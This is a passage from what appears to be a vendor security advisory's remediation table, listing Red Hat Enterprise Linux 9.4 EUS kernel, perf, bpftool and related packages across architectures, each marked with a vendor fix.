| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
